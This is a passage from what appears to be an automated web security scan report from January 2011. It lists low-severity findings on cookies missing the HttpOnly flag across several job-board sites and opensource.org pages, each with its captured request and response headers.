Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.98. http://www.manufacturingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.99. http://www.marketingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.100. http://www.mediajobcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.101. http://www.medicalschoolloans.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.medicalschoolloans.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...

10.102. http://www.militarycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.103. http://www.nursingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.104. http://www.occupationaltherapycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.105. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:59 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 19:47:06 GMT
ETag: "137d5aff6fab07cd18eb3b969e04675a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.106. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 18:31:08 GMT
ETag: "f3ee3970abd9b05424adb4d6b0250644"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.107. http://www.operationscrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.108. http://www.parttimecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.109. http://www.pharmaceuticalcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.110. http://www.physicalsecuritycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.111. http://www.physicaltherapycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.112. http://www.planningcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.113. http://www.postdoctoralfellowcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.114. http://www.prcrossing.com/

Summary

Severity:   Low
